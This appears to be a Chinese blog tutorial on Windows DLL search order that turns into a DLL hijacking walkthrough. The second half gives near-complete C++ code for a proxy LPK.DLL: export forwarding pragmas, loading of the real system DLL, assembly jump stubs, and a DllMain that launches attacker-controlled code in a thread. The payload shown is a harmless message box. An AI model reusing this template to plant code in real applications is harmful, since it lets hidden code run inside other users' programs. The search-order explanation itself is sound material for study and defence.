一.dll加载顺序

1. DLL查找路径基础

  应用程序可以通过以下方式控制一个DLL的加载路径：使用全路径加载、使用DLL重定向、使用manifest文件。如果上述三种方式均未指定，系统查找DLL的顺序将按照本部分描述的顺序进行。

  对于以下两种情况的DLL，系统将不会查找，而是直接加载：

  a. 对于已经加载到内存中的同名DLL，系统使用已经加载的DLL，并且忽略待加载DLL的路径。（注意对某个进程而言，系统已经加载的DLL一定是唯一的存在于某个目录下。）

  b. 如果该DLL存在于某个Windows版本的已知DLL列表（unkown DLL）中，系统使用已知DLL的拷贝（包括已知DLL的依赖项）。已知DLL列表可以从如下注册表项看到：HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs。

  这里有个比较坑的地方，对于有依赖项的DLL（即使使用全路径指定DLL位置），系统查找其所依赖DLL的方法是按照实际的模块名称来的，因此如果加载的DLL不在系统查找顺序目录下，那么动态加载该DLL（LoadLibrary）会返回一个"找不到模块"的错误。

2.系统标准DLL查找顺序

  系统使用的标准DLL查找顺序依赖于是否设置了"安全DLL查找模式"（safe DLL search mode）。"安全DLL查找模式"会将用户当前目录置于查找顺序的后边。
"安全DLL查找模式"默认是启用的，禁用的话，可以将注册表项HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode设为0。调用SetDllDirectory函数可以禁用"安全DLL查找模式"，并修改DLL查找顺序。
Windows XP下，"安全DLL查找模式"默认是禁用的，需要启用该项的话，在注册表中新建一个SafeDllSearchMode子项，并赋值为1即可。"安全DLL查找模式"从Windows XP SP2开始，默认是启用的。

  启用"安全DLL查找模式"时，查找顺序如下：

• a . 应用程序所在目录；

b. 系统目录。GetSystemDirectory返回的目录，通常是系统盘\Windows\System32；
c. 16位系统目录。该项只是为了向前兼容的处理，可以不考虑；
d. Windows目录。GetWindowsDirectory返回的目录，通常是系统盘\Windows；
e. 当前目录。GetCurrentDirectory返回的目录；
f. 环境变量PATH中所有目录。

如果"安全DLL查找模式"被禁用，查找顺序如下：
a. 应用程序所在目录；
b. 当前目录。GetCurrentDirectory返回的目录；
c. 系统目录。GetSystemDirectory返回的目录，通常是系统盘\Windows\System32；
d. 16位系统目录。该项只是为了向前兼容的处理，可以不考虑；
e. Windows目录。GetWindowsDirectory返回的目录，通常是系统盘\Windows；
f. 环境变量PATH中所有目录。

3. 修改系统DLL查找顺序
   系统使用的标准DLL查找顺序可以通过以下两种方式调整：
   3.1 使用LOAD_WITH_ALTERED_SEARCH_PATH标志调用LoadLibraryEx函数；
   这种方式调用LoadLibraryEx函数，需要设置lpFileName参数（绝对路径）。与标准查找策略不同的是，使用LOAD_WITH_ALTERED_SEARCH_PATH标志调用LoadLibraryEx函数的DLL查找顺序将"查找应用程序所在目录"修改为lpFileName指定的目录。
   3.2 调用SetDllDirectory函数。
   注意：SetDllDirectory函数在Windows XP SP1开始支持的。
   函数SetDllDirectory在调用参数lpPathName是一个路径时，可支持修改DLL搜索路径。修改之后的搜索顺序如下：
   a. 应用程序所在目录；
   b. 函数SetDllDirectory参数lpPathName给定的目录；
   c. 系统目录。GetSystemDirectory返回的目录，通常是系统盘\Windows\System32；
   d. 16位系统目录。该项只是为了向前兼容的处理，可以不考虑；
   e. Windows目录。GetWindowsDirectory返回的目录，通常是系统盘\Windows；
   f. 环境变量PATH中所有目录。
   如果lpPathName参数为空字符串，这样就会把当前目录从DLL搜索路径中去掉。
   如果用NULL参数调用SetDllDirectory函数，可以恢复按照系统注册表的"安全DLL查找模式"来查找DLL。

当然win8或者windows server 2012提供更多的可定制方法，这个可以参考MSDN上介绍。比如：SetDefaultDllDirectories、 AddDllDirectory、RemoveDllDirectory。

4.为了测试计算机系统的dll 加载顺序可以通过一个程序加载一个不存在的dll,然后用process monitor 来监控加载的行为。

#include <windows.h>
#include <iostream>

int main(int argc, char ** argv)
{
    using std::cout;
    using std::endl;
    
    // 随便设置一个不存在的dll名
    HMODULE hMod = LoadLibrary("123.dll");

    if (NULL != hMod)
        FreeLibrary(hMod);
        
    cout << "LoadLibrary Test" << endl;
    
    return 0;
}

5.通过process monitor 实际测试win10 64位发现加载顺序是
• 应用程序所在目录
• 系统目录（首先是c:\Windows\SysWOW64；然后是c:\Windows\System）
• windows目录
• 当前目录
• 环境变量path目录

二 dll 劫持

  由于输入表中只包含DLL名而没有它的路径名，因此加载程序必须在磁盘上搜索DLL文件。首先会尝试从当前程序所在的目录加载DLL，如果没找到，则在Windows系统目录中查找，最后是在环境变量中列出的各个目录下查找。利用这个特点，先伪造一个系统同名的DLL，提供同样的输出表，每个输出函数转向真正的系统DLL。程序调用系统DLL时会先调用当前目录下伪造的DLL，完成相关功能后，再跳到系统DLL同名函数里执行。这个过程用个形象的词来描述就是系统DLL被劫持（hijack）了。

  ●DLL劫持的实现●
这一步我们的工作就是通过编程来实现一个LPK.DLL文件，它与系统目录下的LPK.DLL导出表相同，并能加载系统目录下的LPK.DLL，并且能将导出表转发到真实的LPK.DLL。可以看出我们要实现的这个DLL需求如下：

• 1 、构造一个与系统目录下LPK.DLL一样的导出表；

• 2、加载系统目录下的LPK.DLL；

• 3、将导出函数转发到系统目录下的LPK.DLL上；

• 4、在初始化函数中加入我们要执行的代码。

我们使用VC++来进行开发，首先是定义导出函数。核心代码如下：

#pragma comment(linker, "/EXPORT:LpkInitialize=_gamehacker_LpkInitialize,@1")
#pragma comment(linker, "/EXPORT:LpkTabbedTextOut=_gamehacker_LpkTabbedTextOut,@2")
#pragma comment(linker, "/EXPORT:LpkDllInitialize=_gamehacker_LpkDllInitialize,@3")
#pragma comment(linker, "/EXPORT:LpkDrawTextEx=_gamehacker_LpkDrawTextEx,@4")
#pragma comment(linker, "/EXPORT:LpkExtTextOut=_gamehacker_LpkExtTextOut,@6")
#pragma comment(linker, "/EXPORT:LpkGetCharacterPlacement=
_gamehacker_LpkGetCharacterPlacement,@7")
#pragma comment(linker, "/EXPORT:LpkGetTextExtentExPoint=_gamehacker_LpkGetTextExtentExPoint,@8")
#pragma comment(linker, "/EXPORT:LpkPSMTextOut=_gamehacker_LpkPSMTextOut,@9")
#pragma comment(linker, "/EXPORT:LpkUseGDIWidthCache=_gamehacker_LpkUseGDIWidthCache,@10")
#pragma comment(linker, "/EXPORT:ftsWordBreak=_gamehacker_ftsWordBreak,@11")

以上是导出表中的函数，LPK.DLL比较特殊，在导入表中有一项不是函数是数据，因此数据这部分要单独处理。核心代码如下：

★
EXTERNC void __cdecl gamehacker_LpkEditControl(void);   
EXTERNC __declspec(dllexport) void (*LpkEditControl[14])() = {gamehacker_LpkEditControl};  
★

LpkEditControl这个数组有14个成员，如上定义即可，后面我们还需要将真正的数据复制过来。
加载系统目录下的LPK.DLL。核心代码如下：
★
inline BOOL WINAPI Load()
{
TCHAR tzPath[MAX_PATH];
TCHAR tzTemp[MAX_PATH * 2];

  GetSystemDirectory(tzPath, MAX_PATH);
  lstrcat(tzPath, TEXT("\\lpk"));
  m_hModule=LoadLibrary(tzPath);  
  return (m_hModule != NULL); 
 }
★

在代码中可以看到，使用LoadLibrary方式加载系统目录下的LPK.DLL。加载完成后就要实现导出函数的转发了，这步是很关键的。
首先要获得原函数地址。核心代码如下：

★
 FARPROC WINAPI GetAddress(PCSTR pszProcName)
 {
  FARPROC fpAddress;
  CHAR szProcName[16];
  TCHAR tzTemp[MAX_PATH];
  
  fpAddress = GetProcAddress(m_hModule, pszProcName);  
  return fpAddress;
 }
★

然后将我们构造的导出函数一一转发。核心代码如下：

★
ALCDECL gamehacker_LpkInitialize(void)
{
 GetAddress("LpkInitialize");
 __asm JMP EAX;
}
ALCDECL gamehacker_LpkTabbedTextOut(void)
{
 GetAddress("LpkTabbedTextOut");
 __asm JMP EAX;
}
ALCDECL gamehacker_LpkDllInitialize(void)
{
 GetAddress("LpkDllInitialize");
 __asm JMP EAX;
}
ALCDECL gamehacker_LpkDrawTextEx(void)
{
 GetAddress("LpkDrawTextEx");
 __asm JMP EAX;
}
ALCDECL gamehacker_LpkEditControl(void)
{
 GetAddress("LpkEditControl");
 __asm jmp DWORD ptr [EAX];
}
ALCDECL gamehacker_LpkExtTextOut(void)
{
 GetAddress("LpkExtTextOut");
 __asm JMP EAX;
}
ALCDECL gamehacker_LpkGetCharacterPlacement(void)
{
 GetAddress("LpkGetCharacterPlacement");
 __asm JMP EAX;
}
ALCDECL gamehacker_LpkGetTextExtentExPoint(void)
{
 GetAddress("LpkGetTextExtentExPoint");
 __asm JMP EAX;
}
ALCDECL gamehacker_LpkPSMTextOut(void)
{
 GetAddress("LpkPSMTextOut");
 __asm JMP EAX;
}
ALCDECL gamehacker_LpkUseGDIWidthCache(void)
{
 GetAddress("LpkUseGDIWidthCache");
 __asm JMP EAX;
}
ALCDECL gamehacker_ftsWordBreak(void)
{
 GetAddress("ftsWordBreak");
 __asm JMP EAX;
}
★

转发完之后不要忘记LpkEditControl哦，要将真实数据复制过来。核心代码如下：
★
memcpy((LPVOID)(LpkEditControl+1), (LPVOID)((int*)GetAddress("LpkEditControl") + 1),52);
★
好了，到这里整个DLL劫持基本就算完成了，也许你要问，那我们要执行的代码写在哪里？我的方法是将其写到初始化函数中。这样当DLL被加载的时候就会执行。下面看一下DLL的入口函数吧。

★
BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)
{
 if (dwReason == DLL_PROCESS_ATTACH)
 {
  DisableThreadLibraryCalls(hModule);
  if(Load())
  {  
   memcpy((LPVOID)(LpkEditControl+1), (LPVOID)((int*)GetAddress("LpkEditControl") + 1),52);  
   _beginthread(Init,NULL,NULL);
  }
  else
   return FALSE;
 }
 else if (dwReason == DLL_PROCESS_DETACH)
 {
  Free();
 }
 return TRUE;
}
★

在这个函数中我们看到，当加载系统目录下的LPK.DLL成功后，进行了LpkEditControl数组的复制，并通过_beginthread(Init,NULL,NULL);定义了初始化函数Init，而这个初始化函数是由我们控制的。
下面在初始化函数Init中写入测试代码如下：

★
void WINAPIV Init(LPVOID pParam);
void WINAPIV Init(LPVOID pParam)
{
 TCHAR tzPath[MAX_PATH];
 TCHAR tzTemp[MAX_PATH * 2];
  wsprintf(tzTemp, TEXT("劫持函数运行了......."), tzPath);
   MessageBox(NULL, tzTemp, TEXT("gamehacker"), MB_ICONSTOP);
 return; 
} 
★